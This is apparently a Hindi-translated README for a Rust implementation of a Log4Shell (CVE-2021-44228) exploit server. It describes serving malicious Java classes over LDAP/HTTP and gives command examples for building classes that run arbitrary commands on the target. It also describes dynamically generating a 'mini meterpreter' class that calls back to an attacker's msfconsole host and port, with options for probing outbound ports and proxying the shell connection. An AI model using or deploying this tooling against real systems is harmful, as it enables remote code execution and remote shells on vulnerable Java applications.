
Log 4 Shell (log 4 j - CVE-2021-44228) का Rust कार्यान्वयन
Log 4 Shell (log4j - CVE-2021-44228) का Rust कार्यान्वयन
निर्माण के लिए cargo +nightly build चलाएँ
यह संस्करण आपको कमांड क्लासेज़ बनाने, एक मिनी मीटरप्रेटर को गतिशील रूप से सेवा प्रदान करने की अनुमति देता है जो शोषित Java ऐप के एक थ्रेड में चलता है, और LDAP और HTTP सर्वर चलाता है। यह संस्करण LDAP और HTTP अनुरोधों को एक ही पोर्ट पर सेवा प्रदान करता है।
आप एक साथ कई पोर्ट पर चल सकते हैं ताकि यह देख सकें कि लक्ष्य मशीन के लिए कौन से पोर्ट आउटगोइंग के लिए उपलब्ध हो सकते हैं।
यदि अनुरोध LDAP या HTTP नहीं है, तो यह अनुरोध को उसी पोर्ट पर किसी अन्य मशीन पर प्रॉक्सी कर सकता है। यदि लक्ष्य मशीन में केवल एक आउटगोइंग पोर्ट है, तो आप LDAP, HTTP की सेवा कर सकते हैं और उसी पोर्ट का उपयोग मीटरप्रेटर कनेक्शन को किसी अन्य स्थानीय पोर्ट या किसी अन्य मशीन पर प्रॉक्सी करने के लिए कर सकते हैं।
इस संस्करण में अब javac को स्थापित करने की आवश्यकता नहीं है। यह अभी भी गतिशील "क्लास बिल्डिंग" की अनुमति देता है, लेकिन ऐसा निष्पादन योग्य में एम्बेडेड प्रीकंपाइल्ड क्लासेज़ को बदलकर करता है।
यह संस्करण nmap द्वारा परिभाषित शीर्ष 100 और शीर्ष 1000 पोर्ट जोड़ता है। --pC100 या --pC1000 विकल्पों का उपयोग करें।
सामान्य उपयोग का मामला कमांड क्लास(ज़) बनाना और फिर सर्वर चलाना है।
l4srs build -c Cmd1 -l firefox -w Calc.exe
l4srs build -c TouchMe -l "touch /tmp/me"
तब आप Cmd1 का अनुरोध कर सकते हैं और यह Linux पर firefox और Windows पर Calc लॉन्च करेगा। यदि आप TouchMe का अनुरोध करते हैं, तो यह Linux पर /tmp/me को टच करेगा और Windows पर कुछ भी निष्पादित नहीं करेगा।
फिर आप l4srs run --pC100 चला सकते हैं ताकि शीर्ष 100 पोर्ट पर सर्वर शुरू हो और Cmd1 या TouchMe की सेवा दे सके।
इसके अतिरिक्त, यदि आप MM:Host:port का अनुरोध करते हैं, तो यह गतिशील रूप से एक मिनी मीटरप्रेटर क्लास बनाएगा जो अनुरोध में निर्दिष्ट होस्ट और पोर्ट तक पहुंचेगा। यदि आपका msfconsole 10.20.30.40 पर पोर्ट 4444 पर चल रहा है, तो आप MM:10.20.30.40:4444 का अनुरोध करेंगे; यह बिल्ड कमांड के साथ नहीं बनाया गया है, बल्कि अनुरोध पर गतिशील रूप से बनाया गया है।
यह संस्करण मेमोरी कैश से क्लासेज़ के निर्माण और सेवा की अनुमति देता है। सभी गतिशील MiniMeterpreter क्लासेज़ अब फ़ाइल सिस्टम को स्पर्श नहीं करते हैं। इसके अतिरिक्त, 2 नए फ़्लैग जोड़े गए हैं। पहला --no_fs है जो यह सुनिश्चित करेगा कि हम फ़ाइल सिस्टम से कभी कोई फ़ाइल सेवा न करें। दूसरा --allow_cmd है जो किसी भी खुले पोर्ट से /build_cmd पर POST अनुरोध के साथ और फ़ील्ड्स के साथ json बॉडी भेजकर गतिशील क्लास निर्माण को सक्षम करेगा: class_name, l_cmd, w_cmd